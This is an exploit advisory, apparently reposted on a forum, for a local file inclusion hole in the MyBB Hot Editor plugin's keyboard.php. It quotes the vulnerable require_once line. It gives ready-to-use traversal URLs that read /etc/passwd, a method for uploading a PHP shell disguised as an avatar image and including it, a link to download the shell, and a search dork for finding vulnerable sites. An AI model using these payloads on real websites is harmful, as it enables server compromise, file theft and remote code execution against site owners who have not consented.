Mybb Hot Editor Plugin Local File Inclusion
<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0@expw0rm.com
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd
And
upload php shell = > http://www.expw0rm.com/avatar_36.zip
http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif
=> target isn't show with ie.plese you use firefox
Dork: "MTR Paket :"
?>
// Exploit Worm www.expw0rm.com
orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html
討論串 (同標題文章)
完整討論串 (本文為第 1 之 3 篇):